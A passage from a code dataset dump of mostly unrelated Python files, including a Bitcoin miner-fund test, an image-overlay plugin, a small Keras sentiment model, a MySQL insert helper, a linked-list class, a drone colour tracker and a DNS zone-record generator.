get_best_coinbase()\n assert_equal(len(coinbase['vout']), 1)\n block_reward = coinbase['vout'][0]['value']\n\n # First block with the new rules.\n node.generatetoaddress(1, address)\n\n # Now we send part of the coinbase to the fund.\n coinbase = get_best_coinbase()\n assert_equal(len(coinbase['vout']), 2)\n assert_equal(\n coinbase['vout'][1]['scriptPubKey']['addresses'][0],\n MINER_FUND_ADDR)\n\n total = Decimal()\n for o in coinbase['vout']:\n total += o['value']\n\n assert_equal(total, block_reward)\n assert_greater_than_or_equal(\n coinbase['vout'][1]['value'],\n (MINER_FUND_RATIO * total) / 100)\n\n # Invalidate top block, submit a custom block that do not send anything\n # to the fund and check it is rejected.\n node.invalidateblock(node.getbestblockhash())\n\n block_height = node.getblockcount() + 1\n block = create_block(\n fork_block_hash, create_coinbase(block_height), AXION_ACTIVATION_TIME + 1, version=4)\n block.solve()\n\n assert_equal(node.submitblock(ToHex(block)), 'bad-cb-minerfund')\n\n\nif __name__ == '__main__':\n MinerFundTest().main()\n","sub_path":"test/functional/abc_feature_minerfund.py","file_name":"abc_feature_minerfund.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"280243948","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING\n\nimport numpy as np\nfrom PySide6.QtCore import QObject\n\nfrom bsmu.vision.core.plugins.base import Plugin\nfrom bsmu.vision.core.image.layered import LayeredImage\nfrom bsmu.vision.core.palette import Palette\n\nif TYPE_CHECKING:\n from bsmu.vision.plugins.visualizers.manager import DataVisualizationManagerPlugin, DataVisualizationManager\n from bsmu.vision.plugins.loaders.manager import FileLoadingManagerPlugin, FileLoadingManager\n\n\nclass ImageViewerIntersectionOverlayerPlugin(Plugin):\n _DEFAULT_DEPENDENCY_PLUGIN_FULL_NAME_BY_KEY = {\n 'data_visualization_manager_plugin': 'bsmu.vision.plugins.visualizers.manager.DataVisualizationManagerPlugin',\n 'file_loading_manager_plugin': 'bsmu.vision.plugins.loaders.manager.FileLoadingManagerPlugin',\n }\n\n def __init__(\n self,\n data_visualization_manager_plugin: DataVisualizationManagerPlugin,\n file_loading_manager_plugin: FileLoadingManagerPlugin,\n ):\n super().__init__()\n\n self._data_visualization_manager_plugin = data_visualization_manager_plugin\n self._data_visualization_manager: DataVisualizationManager | None = None\n\n self._file_loading_manager_plugin = file_loading_manager_plugin\n self._file_loading_manager: FileLoadingManager | None = None\n\n self._overlayer: ImageViewerIntersectionOverlayer | None = None\n\n def _enable(self):\n self._data_visualization_manager = self._data_visualization_manager_plugin.data_visualization_manager\n self._file_loading_manager = self._file_loading_manager_plugin.file_loading_manager\n\n self._overlayer = ImageViewerIntersectionOverlayer(\n self._data_visualization_manager,\n self._file_loading_manager,\n self.config.value('layers'),\n self.config.value('intersection-layer'),\n )\n\n self._data_visualization_manager.data_visualized.connect(\n self._overlayer.overlay_sibling_dirs_mask_intersection)\n\n def _disable(self):\n self._data_visualization_manager.data_visualized.disconnect(\n self._overlayer.overlay_sibling_dirs_mask_intersection)\n\n self._overlayer = None\n\n\nclass ImageViewerIntersectionOverlayer(QObject):\n def __init__(\n self,\n visualization_manager: DataVisualizationManager,\n loading_manager: FileLoadingManager,\n layers_properties: dict,\n intersection_layer_properties: dict,\n ):\n super().__init__()\n\n self.visualization_manager = visualization_manager\n self.loading_manager = loading_manager\n self.layers_properties = layers_properties\n self.intersection_layer_properties = intersection_layer_properties\n\n def overlay_sibling_dirs_mask_intersection(self, data: Data, data_viewer_sub_windows: DataViewerSubWindow):\n if isinstance(data, LayeredImage):\n first_layer = data.layers[0]\n first_layer_image_name = first_layer.image_path.name\n layers_dir = first_layer.path.parent\n\n intersection_image = None\n intersection_layer_index = len(self.layers_properties) + 1\n # First row is all zeros color (empty mask), last row is for intersection mask color\n intersection_palette_array = np.zeros(shape=(intersection_layer_index + 1, 4), dtype=np.uint8)\n\n for i, (new_layer_name, layer_properties) in enumerate(self.layers_properties.items()):\n new_layer_image_path = layers_dir / new_layer_name / first_layer_image_name\n layer_index = i + 1\n if new_layer_image_path.exists():\n color_property = layer_properties.get('color')\n intersection_palette_array[layer_index] = color_property\n new_image = self.loading_manager.load_file(new_layer_image_path)\n\n if intersection_image is None:\n new_image.array[new_image.array > 0] = layer_index\n intersection_image = new_image\n else:\n masked_new_image = new_image.array > 0\n intersection_image.array[np.logical_and(intersection_image.array > 0, masked_new_image)] = intersection_layer_index\n intersection_image.array[np.logical_and(intersection_image.array == 0, masked_new_image)] = layer_index\n\n print('LEN', len(self.layers_properties))\n\n if intersection_image is not None:\n print('II', np.unique(intersection_image.array))\n intersection_palette_array[intersection_layer_index] = self.intersection_layer_properties['color']\n print('palette', intersection_palette_array)\n intersection_image.palette = Palette(intersection_palette_array)\n intersection_layer = data.add_layer_from_image(intersection_image, self.intersection_layer_properties['name'])\n\n intersection_layer_opacity = self.intersection_layer_properties['opacity']\n for data_viewer_sub_window in data_viewer_sub_windows:\n layered_image_viewer = data_viewer_sub_window.viewer\n layered_image_viewer.layer_view_by_model(intersection_layer).opacity = intersection_layer_opacity\n","sub_path":"vision-plugins/src/bsmu/vision/plugins/overlayers/intersection.py","file_name":"intersection.py","file_ext":"py","file_size_in_byte":5384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"218722214","text":"import numpy as np\nfrom tensorflow.keras.preprocessing.text import Tokenizer\n\n\ndocs = ['너무 재밌습니다', '참 최고입니다', '참 잘 만든 영화입니다', '추천하고 싶은 영화입니다', '한 번 더 보고 싶습니다',\n '글쎄요', '별로입니다', '생각보다 지루합니다', '연기가 어색합니다', '재미없습니다', ' 너무 재미없다', \n '참 재밌습니다', '청순이가 잘 생기긴 했어요']\n\n# 라벨링 -> 긍정: 1, 부정: 0 \nlabels = np.array([1,1,1,1,1,0,0,0,0,0,0,1,1])\ntoken = Tokenizer()\ntoken.fit_on_texts(docs)\n# print(token.word_index) \n'''\n{'참': 1, '너무': 2, '재밌습니다': 3, '잘': 4, '영화입니다': 5, '최고입니다': 6, '만든': 7, '추천\n하고': 8, '싶은': 9, '한': 10, '번': 11, '더': 12, '보고': 13, '싶습니다': 14, '글쎄요': 15, '별 \n로입니다': 16, '생각보다': 17, '지루합니다': 18, '연기가': 19, '어색합니다': 20, '재미없습니다': \n21, '재미없다': 22, '청순이가': 23, '생기긴': 24, '했어요': 25}\n'''\n\nx = token.texts_to_sequences(docs)\n# print(x) # [[2, 3], [1, 6], [1, 4, 7, 5], [8, 9, 5], [10, 11, 12, 13, 14], [15], [16], [17, 18], [19, 20], [21], [2, 22], [1, 3], [23, 4, 24, 25]]\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\npad_x = pad_sequences(x, padding='pre', maxlen=5)\n# print(pad_x, pad_x.shape)\n'''\n[[ 0 0 0 2 3][ 0 0 0 1 6][ 0 1 4 7 5][ 0 0 8 9 5][10 11 12 13 14][ 0 0 0 0 15][ 0 0 0 0 16]\n[ 0 0 0 17 18][ 0 0 0 19 20][ 0 0 0 0 21][ 0 0 0 2 22][ 0 0 0 1 3][ 0 23 4 24 25]] \n(13, 5)\n '''\n\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Input, Embedding, LSTM, Dense, Conv1D\n# print(len(token.word_index)) # 25\n# print(np.unique(pad_x)) # 0~25 -> 26\n\n# input = Input((5,))\n# a = Dense(2)(input)\n# output = Dense(1, activation='sigmoid')(a)\n# model = Model(inputs=input, outputs=output)\n\n# pad_x = pad_x.reshape(13, 5, 1)\n# input = Input((5,1))\n# a = Conv1D(2,2)(input)\n# output = Dense(1, activation='sigmoid')(a)\n# model = Model(inputs=input, outputs=output)\n\npad_x = pad_x.reshape(13, 5, 1)\ninput = Input((5,1))\na = LSTM(2)(input)\noutput = Dense(1, activation='sigmoid')(a)\nmodel = Model(inputs=input, outputs=output)\n\nmodel.compile(loss='binary_crossentropy', optimizer='adam', metrics=['acc'])\nmodel.fit(pad_x, labels, epochs=39, batch_size=1)\n\nacc = model.evaluate(pad_x, labels)[1]\nprint('acc = ', acc)\n# acc = 0.6153846383094788\n# acc = 0.6730769276618958\n# acc = 0.9230769276618958\n","sub_path":"keras01/keras52_no_embedding.py","file_name":"keras52_no_embedding.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"183795614","text":"# -*-coding:utf-8 -*-\n# time: 2018.3.22\n\nimport pymysql\nimport datetime\nimport logging\n\n\nclass get_Mysql(object):\n def __init__(self, dbname, xls_name):\n self.dbname = dbname\n self.T = datetime.datetime.strftime(datetime.datetime.now(), \"%Y%m%d%H%M\")\n # 数据表的名称\n self.table_name = '{}'.format(xls_name)\n # 连接接数据库\n self.conn = pymysql.connect(\n host='127.0.0.1',\n user='root',\n password='1219960386',\n port=3306,\n db=self.dbname,\n charset='utf8'\n )\n # 获取游标\n self.cursor = self.conn.cursor()\n\n def create_table(self):\n \"\"\"\n 创建数据表的函数,表格名称按照时间和关键词命名\n \"\"\"\n sql = '''CREATE TABLE `{tbname}` (\n `id` int(10) unsigned NOT NULL AUTO_INCREMENT,\n {biddingMethod} varchar(20) DEFAULT NULL COMMENT '招标方式',\n {biddingCycle} varchar(20) DEFAULT NULL COMMENT '招标周期',\n {identifier} varchar(255) DEFAULT NULL COMMENT '编号',\n {hbrainCategory} varchar(255) DEFAULT NULL COMMENT '物料总类',\n {orderedItem} varchar(255) DEFAULT NULL COMMENT '物料名称',\n {orderedItemIdentifier} varchar(255) DEFAULT NULL COMMENT '物料编码',\n {itemCondition} varchar(255) DEFAULT NULL COMMENT '规格',\n {customer} varchar(255) CHARACTER SET utf8 COLLATE utf8_unicode_ci DEFAULT NULL COMMENT '使用企业',\n {seller} varchar(255) DEFAULT NULL COMMENT '中标人/供应商',\n {orderDate} datetime DEFAULT NULL COMMENT '开标时间/单据日期',\n {price} varchar(255) DEFAULT NULL COMMENT '中标价/采购单价',\n {totalUnit} varchar(255) DEFAULT NULL COMMENT '采购数量',\n {totalPrice} varchar(255) DEFAULT NULL COMMENT '中标金额/采购总价',\n PRIMARY KEY (`id`)\n ) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n'''\n try:\n self.cursor.execute(sql.format(tbname=self.table_name, biddingMethod=\"biddingMethod\",\n biddingCycle=\"biddingCycle\", identifier=\"identifier\",\n hbrainCategory=\"hbrainCategory\", orderedItem=\"orderedItem\",\n orderedItemIdentifier=\"orderedItemIdentifier\", itemCondition=\"itemCondition\",\n customer=\"customer\", seller=\"seller\", orderDate=\"orderDate\",\n price=\"price\", totalUnit=\"totalUnit\", totalPrice=\"totalPrice\",))\n except Exception as e:\n logging.warning(e)\n print(\"创建数据表失败,表格可能已经存在!\", e)\n else:\n self.conn.commit()\n print(\"成功创建一个数据表,名称是{}\".format(self.table_name))\n\n def insert_data(self, data):\n \"\"\"数据插入\"\"\"\n insert_sql = '''INSERT INTO `{tbname}`(biddingMethod, biddingCycle, identifier, hbrainCategory, orderedItem,\n orderedItemIdentifier, itemCondition, customer, seller, orderDate,\n price, totalUnit, totalPrice) \n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s) \n '''\n try:\n self.cursor.execute(insert_sql.format(tbname=self.table_name),\n (data['biddingMethod'], data['biddingCycle'], data['identifier'],\n data['hbrainCategory'], data['orderedItem'], data['orderedItemIdentifier'],\n data['itemCondition'], data['customer'], data['seller'],\n data['orderDate'], data['price'], data['totalUnit'], data['totalPrice']))\n\n except Exception as e:\n self.conn.rollback()\n print(\"Insert data failure, cause:\", e)\n logging.warning(e)\n\n else:\n self.conn.commit()\n print('Insert a data successfully!')\n\n def close_table(self):\n print(\"End of data insert !\")\n self.cursor.close()\n self.conn.close()\n\n\nif __name__ == '__main__':\n \"\"\"\n 测试\n \"\"\"\n data = {'biddingMethod': '线上招标', 'biddingCycle': '月度招标', 'identifier': 'ZB-ZY-ZY-1802002-1',\n 'hbrainCategory': '中药', 'orderedItem': '月度招标', 'orderedItemIdentifier': 'ZB-ZY-ZY-1802002-1',\n 'itemCondition': '月度招标', 'customer': '中药二厂', 'seller': '安国义通中药材有限公司',\n 'orderDate': '2018/2/6', 'price': '21', 'totalUnit': '1000', 'totalPrice': '0.53'}\n\n my = get_Mysql('market_price',\n 'test1')\n my.create_table()\n my.insert_data(data)\n my.close_table()\n\n","sub_path":"xls_to_sql/save_data/connect_to_mysql.py","file_name":"connect_to_mysql.py","file_ext":"py","file_size_in_byte":4971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"289787775","text":"import sys\r\nimport unittest\r\n\r\nsys.path.append('../')\r\n\r\nfrom challenge.cache.fileCache import FileCache\r\n\r\ncacheClient = FileCache()\r\n\r\n\r\nclass TestFileEmpty(unittest.TestCase):\r\n\tdef test_file_empty(self):\r\n\t\tis_file_empty = cacheClient.is_file_empty()\r\n\t\tself.assertEqual(False, is_file_empty)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\tunittest.main()\r\n","sub_path":"tests/test_if_filecache_empty.py","file_name":"test_if_filecache_empty.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"284419929","text":"import models as m\nimport sqlRepo as repo\n\n\n\ndef Main():\n repo.DBTestFunction()\n \n #TestFunc3()\n \n\n\ndef TestFunc3():\n a= \" abc\" * 4\n print(a)\n print(len(a))\n\n\n\ndef testFunc():\n arr= ['abc','cde','efg']\n print(arr[1])\n print(len(arr))\n print(arr)\n\n for x in arr:\n print(x) \n\n\nclass myclass:\n x=1\n y=\"fahim\"\n\ndef testFunc2():\n a = myclass()\n a.x=5\n\n print(a.x,a.y)\n\n theList=[]\n for x in range(10):\n id = x\n num = x * 321\n name = \"fahim\" + str(num)\n\n d = m.Patient(id,num,name)\n theList.append(d)\n\n\n # print(d.Name,d.CellNumber,d.Id)\n print(len(theList))\n selected = None\n for x in theList:\n if(x.Id == 3):\n selected = x\n break\n\n\n\n print(selected.CellNumber)\n\n\n\nMain()","sub_path":"hello/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"401046434","text":"import h5py\nimport numpy as np\nfrom imageio import imwrite\nfrom sklearn.cluster import KMeans\nfrom model_data import Model_data\nfrom helpers import cat_image_to_gray\nimport os.path\nimport config\nimport random\n\nh5s = config.get_h5(ignore_1_2=True)\n\ndatam = Model_data(\n kernel_size=(9, 9, 1), remove_unlabeled=False, one_hot=False,\n flat_features=True, from_h5=True, bag_size=1, annotation_groupname=\"\")\ndatam2 = Model_data(\n kernel_size=(1, 1, 1), remove_unlabeled=False, one_hot=False,\n flat_features=True, from_h5=True, bag_size=1, annotation_groupname=\"\")\n\n\nh5s = {str(fn): h5py.File(config.data_path + str(fn) + \".h5\", \"a\")\n for fn in range(1, 6)}\n\ndatam.bag_size = 1\nX = []\nmodel = KMeans(n_clusters=16, n_jobs=30,\n precompute_distances=True)\n\n\ndef to_rgb1a(im):\n w, h = im.shape\n ret = np.empty((w, h, 3), dtype=np.uint8)\n ret[:, :, 2] = ret[:, :, 1] = ret[:, :, 0] = im\n return ret\n\n\ndef func(x):\n h5f, df = x\n if len(df) > 6 or random.uniform(0, 1) < 0.95:\n return False\n fname = \"%s%s/%s_pred.png\" % (\n config.kmeans_path, h5f.filename[-4], df)\n if os.path.isfile(fname):\n return True\n print(x)\n image, _ = datam.handle_images([(h5f, df)])\n if np.sum(image) == 0:\n print(\"Empty\")\n return False\n model.fit(image)\n pred = model.predict(image)\n uniques = np.unique(pred, return_counts=True)\n if len(uniques[0]) < 16:\n return False\n model.init = model.cluster_centers_\n pred = pred.reshape(1024, 1024)\n imwrite(fname, pred)\n image, _ = datam2.handle_images([(h5f, df)])\n image = image.reshape(1024, 1024)\n image = to_rgb1a(image.astype(np.uint8))\n fname = \"%s/kmeans_labels/%s/%s.png\" % (\n config.data_path, h5f.filename[-4], df)\n imwrite(fname, image)\n return True\n\n\nfor h5fn in config.h5s[2:]:\n h5f = h5py.File(h5fn, 'r+')\n [func((h5f, df)) for df in h5f.keys()]\n","sub_path":"labels/kmeans3.py","file_name":"kmeans3.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"41394566","text":"from datetime import datetime\n\n\nclass Record:\n def __init__(self, email=None, atime=None, subject=None, author=None, url=None, text=None):\n self.id = None\n self.email = email\n self.cnt = 1\n self.time = atime\n self.subject = subject\n self.author = author\n self.url = url\n self.text = text\n\n @staticmethod\n def clearstr(s):\n s = s.strip()\n if len(s) == 0:\n return 'NA'\n return s\n\n def load(self, record):\n self.id = Record.clearstr(record[\"_id\"])\n self.email = Record.clearstr(record[u\"email\"])\n self.subject = Record.clearstr(record[u\"subject\"])\n self.author = Record.clearstr(record[u\"author\"])\n self.cnt = record[u\"cnt\"]\n self.time = record[u\"time\"]\n self.url = record.get('url')\n self.text = record.get('text')\n return self\n\n def dump(self):\n return {\n u\"_id\": self.id,\n u\"email\": self.email,\n u\"cnt\": self.cnt,\n u\"time\": self.time,\n u\"subject\": self.subject,\n u\"author\": self.author,\n u\"url\": self.url,\n u\"text\": self.text\n }","sub_path":"Record.py","file_name":"Record.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"373720677","text":"def notas(*n, sit=False):\n \"\"\"\n\n :param n: Notas do Aluno\n :param sit: (Se sit=True) mostra a situação do aluno\n :return: Retorna uma biblioteca que nela se encontra o total de notas, maior nota, menor, média e situação (se sit=True)\n \"\"\"\n aluno = dict()\n aluno['total'] = len(n)\n aluno['maior'] = max(n)\n aluno['menor'] = min(n)\n aluno['media'] = sum(n) / len(n)\n if sit:\n if aluno['media'] <= 6:\n aluno['situação'] = 'RUIM'\n elif aluno['media'] > 6 and aluno['media'] <= 7:\n aluno['situação'] = 'RAZOÁVEL'\n elif aluno['media'] > 7:\n aluno['situação'] = 'BOA'\n\n return aluno\n\n\n\nresp = notas(3, 2, 5, 7, 9, sit=True)\nprint(resp)\n","sub_path":"Projetos Python/Aulas Python/aula 21/Desafio 105.py","file_name":"Desafio 105.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"414327449","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n# Import modules\nfrom logger import setup_custom_logger\nfrom file_writer import file_writer\nimport sys\nimport pandas as pd\nimport cbsodata\nimport datetime\nfrom msg import *\n\n\n# Setup of logger\ntry:\n logger = setup_custom_logger(\"B003_Permits_New_Houses\")\n logger.info(\"---------------------------------------------------\")\n logger.info(txtStarting + \" \" + logger.name)\nexcept:\n logger.exception(\"logger could not be loaded\")\n raise\n\n\ntry:\n # Get current date information\n now = datetime.datetime.now()\n\n yearMin = now.year - 4\n yearMax = now.year\n\n # Values you can load\n # now.year\n # now.month\n # now.day\n # now.hour\n # now.minute\nexcept:\n logger.exception(\"datetime could not be loaded\")\n logger.info(\"set yearmin to a default value\")\n # Set default values for fallback\n yearMin = 2010\n yearMax = 2030\n raise\n\n\n# Dataset 83668NED\ndataset_id = \"83668NED\"\n\n# Table definitions\n# Woningen_1 = Bouwvergunningen_woonruimten_Woningen\n# Wooneenheden_2 = Bouwvergunningen_woonruimten_Wooneenheden\n# Recreatiewoningen_3 = Bouwvergunningen_woonruimten_Recreatiewoningen\n\n\ntry:\n logger.info(f\"Retrieve data from dataset {dataset_id}\")\n data = pd.DataFrame(\n cbsodata.get_data(\n f\"{dataset_id}\",\n filters=f\"substring(Perioden,0,4) ge '{yearMin}'\",\n select=[\"Perioden\", \"Woningen_1\", \"Wooneenheden_2\", \"Recreatiewoningen_3\"],\n )\n )\nexcept:\n logger.exception(\"error loading data from CBS Statline\")\n raise\n\n\n# Rename columns\ntry:\n data = data.rename(\n columns={\n \"Woningen_1\": \"Bouwvergunningen_woonruimten_Woningen\",\n \"Wooneenheden_2\": \"Bouwvergunningen_woonruimten_Wooneenheden\",\n \"Recreatiewoningen_3\": \"Bouwvergunningen_woonruimten_Recreatiewoningen\",\n }\n )\n\nexcept:\n logger.exeption(\"Columns could not be renamed\")\n raise\n\n\n# Date formatting and quarter format\ntry:\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" januari\", \"-01\")\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" februari\", \"-02\")\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" maart\", \"-03\")\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" april\", \"-04\")\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" mei\", \"-05\")\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" juni\", \"-06\")\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" juli\", \"-07\")\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" augustus\", \"-08\")\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" september\", \"-09\")\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" oktober\", \"-10\")\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" november\", \"-11\")\n data[\"Perioden\"] = data[\"Perioden\"].str.replace(\" december\", \"-12\")\n data[\"Perioden\"] = pd.to_datetime(data[\"Perioden\"]).dt.date\nexcept:\n logger.exception(\n \"Columns could not be changed to monthly numbers or formatted to different date\"\n )\n raise\n\n\n# Export dataFrame to Excel file\ntry:\n file_writer(data, \"B003_Permits_New_Houses\")\n logger.info(txtDone)\nexcept:\n logger.exception(\"dataFrame could not be exported to output folder\")\n","sub_path":"sse-aai-zsa/Zsa/scripts/B003_Permits_New_Houses.py","file_name":"B003_Permits_New_Houses.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"19489808","text":"class Node:\r\n def __init__(self, data=None, next=None):\r\n self.data = data\r\n self.next = next\r\n\r\n def __repr__(self):\r\n return repr(self.data)\r\n\r\n\r\nclass LinkedList:\r\n def __init__(self):\r\n self.head = None\r\n\r\n # Display the linked list\r\n def __repr__(self):\r\n temp = self.head\r\n nodes = []\r\n while temp:\r\n nodes.append(repr(temp))\r\n temp = temp.next\r\n return '[' + ', '.join(nodes) + ']'\r\n\r\n # Insert in the linked list\r\n def append(self, data):\r\n if not self.head:\r\n self.head = Node(data=data)\r\n return\r\n temp = self.head\r\n while temp.next:\r\n temp = temp.next\r\n temp.next = Node(data=data)\r\n\r\n # Insert in the beginning of the linked list\r\n def appendleft(self, data):\r\n self.head = Node(data=data, next=self.head)\r\n\r\n # Find the element in the linked list\r\n def find(self, key):\r\n temp = self.head\r\n while temp and temp.data != key:\r\n temp = temp.next\r\n return temp\r\n\r\n # Delete the element from the linked list\r\n def delete(self, key):\r\n temp = self.head\r\n prev = None\r\n while temp and temp.data != key:\r\n prev = temp\r\n temp = temp.next\r\n if not prev:\r\n self.head = temp.next\r\n elif temp:\r\n prev.next = temp.next\r\n temp = None\r\n else:\r\n print(f'{key} not found')\r\n\r\n # Reverse the linked list\r\n def reverse(self):\r\n temp = self.head\r\n prev_node = None\r\n next_node = None\r\n while temp:\r\n next_node = temp.next\r\n temp.next = prev_node\r\n prev_node = temp\r\n temp = next_node\r\n self.head = prev_node\r\n\r\n\r\nif __name__ == '__main__':\r\n ll = LinkedList()\r\n ll.append(1998)\r\n ll.append('A-geeky-man')\r\n ll.append('GitHub')\r\n ll.appendleft('Jan')\r\n ll.appendleft(20)\r\n print(ll) # printing the original linked list\r\n ll.reverse()\r\n print(ll) # printing the reversed linked list\r\n print(ll.find(20)) # printing the found element\r\n print(ll.find('GitHub')) # printing the found element\r\n ll.delete(1998)\r\n print(ll) # printing the linked list after deleting an element\r\n ll.reverse()\r\n print(ll) # printing the reversed linked list\r\n","sub_path":"linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"295290849","text":"#!/usr/bin/env python\n\nimport rospy, cv2\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\nimport numpy as np\nfrom std_msgs.msg import Int32\nclass Red:\n def __init__(self):\n self.lower = np.array([150, 50, 50])\n self.upper = np.array([180, 255, 255])\n\nclass red_pick():\n def __init__(self):\n sub = rospy.Subscriber(\"/ardrone/front/image_raw\",Image,self.get_image)\n self.bridge = CvBridge()\n self.image_org = None\n self.pub = rospy.Publisher(\"red\",Image,queue_size=1)\n self.posi_pub = rospy.Publisher(\"posi\",Int32,queue_size=1)\n\n def monitor(self,rect,org):\n if rect is not None:\n self.pub.publish(self.bridge.cv2_to_imgmsg(org,\"bgr8\"))\n\n def get_image(self,img):\n try:\n self.image_org = self.bridge.imgmsg_to_cv2(img,\"bgr8\")\n except CvBridgeError as e:\n rospy.logerr(e)\n\n\n def detectRectOfTargetColor(self,frame, colorObj):\n\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n h = hsv[:, :, 0]\n s = hsv[:, :, 1]\n mask = np.zeros(h.shape, dtype=np.uint8)\n mask = cv2.inRange(hsv, colorObj.lower, colorObj.upper)\n\n image, contours, hierarchy = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n \n rects = []\n\n\n for contour in contours:\n approx = cv2.convexHull(contour)\n rect = cv2.boundingRect(approx)\n rects.append(np.array(rect))\n\n return rects\n\n def pick_check(self):\n if self.image_org is None:\n return None\n \n frame = self.image_org\n\n rects_red = self.detectRectOfTargetColor(frame, Red())\n\n \n\n \n if len(rects_red) > 0:\n rect = max(rects_red, key=(lambda x: x[2] * x[3]))\n cv2.rectangle(frame, tuple(rect[0:2]), tuple(rect[0:2] + rect[2:4]), (0, 0, 255), thickness=2)\n cent = (rect[0:2]*2+rect[2:4])/2\n print(cent)\n self.posi_pub.publish(cent[0])\n \n\n if len(rects_red) == 0:\n self.monitor(None,frame)\n return None\n\n r =rects_red[0]\n self.monitor(r,frame)\n return r\n\n \n\n \n\nif __name__=='__main__':\n rospy.init_node('red_pick')\n fd = red_pick()\n\n rate = rospy.Rate(10)\n while not rospy.is_shutdown():\n fd.pick_check()\n rate.sleep()#rosrun image_view image_view image:=/red\n","sub_path":"src/flag_down.py","file_name":"flag_down.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"592079005","text":"#!/usr/bin/python\r\nimport csv\r\n\r\ninput_file_name = \"germanyenergy.csv\"\r\nforward_file_name = \"germanyforward.txt\"\r\nreverse_file_name = \"germanyreverse.txt\"\r\ndomain_name = \".energy.germany.\"\r\n\r\ninput_file = open(input_file_name,'r')\r\nforward_file = open(forward_file_name,'w')\r\nreverse_file = open(reverse_file_name,'w')\r\ninput_reader = csv.reader(input_file)\r\n\r\nfor line in input_reader:\r\n\thost = line[0]\r\n\tip = line[1]\r\n\tfqdn = host + domain_name\r\n\tpadding = ' ' * (30 - len(fqdn))\r\n\tforward_file.write(fqdn + padding +'IN A ' + ip + '\\n')\r\n\t[i1,i2,i3,i4] = ip.split('.')\r\n\trevaddr = i4 + '.' + i3 + '.' + i2 + '.' + i1 + '.in-addr.arpa.'\r\n\tpadding = ' ' * (30 - len(revaddr))\r\n\treverse_file.write(revaddr + padding + 'IN PTR ' + fqdn + '\\n')","sub_path":"Exercise Initialization/Bind Config/germanyenergy.py","file_name":"germanyenergy.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"1516992","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\py_buildsystem\\py_buildsystem.py\n# Compiled at: 2019-01-14 14:07:24\n# Size of source mod 2**32: 1105 bytes\nimport sys, argparse\nfrom py_buildsystem.common import logger, levels\nimport py_buildsystem.Project.Project as Project\nimport py_buildsystem.Toolchain.Toolchain as Toolchain\nsys.tracebacklimit = 0\nparser = argparse.ArgumentParser(usage='python -m py_buildsystem [options]', description='Python based build system.')\nparser.add_argument('compiler_config', metavar='CC', type=str, nargs=1, help='Compiler configuration file')\nparser.add_argument('project_config', metavar='PC', type=str, nargs=1, help='Project configuration file')\nparser.add_argument('compiler_path', metavar='path', type=str, nargs='?', default='', help='Path to compiler')\nparser.add_argument('-v', '--verbose', action='store_true', help='verbose mode')\nargs = parser.parse_args()\nif args.v is True:\n logger.setLevel(levels['DEBUG'])\nelse:\n logger.setLevel(levels['INFO'])\ntoolchain = Toolchain(args.compiler_config[0], args.compiler_path)\nproject = Project(args.project_config[0], toolchain)","sub_path":"pycfiles/py_buildsystem-0.6.3-py3.7/py_buildsystem.cpython-37.py","file_name":"py_buildsystem.cpython-37.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"373248345","text":"# 283. Move Zeroes\n# ttungl@gmail.com\n\n# Given an array nums, write a function to move all 0's to the end of it while maintaining the relative order of the non-zero elements.\n\n# For example, given nums = [0, 1, 0, 3, 12], after calling your function, nums should be [1, 3, 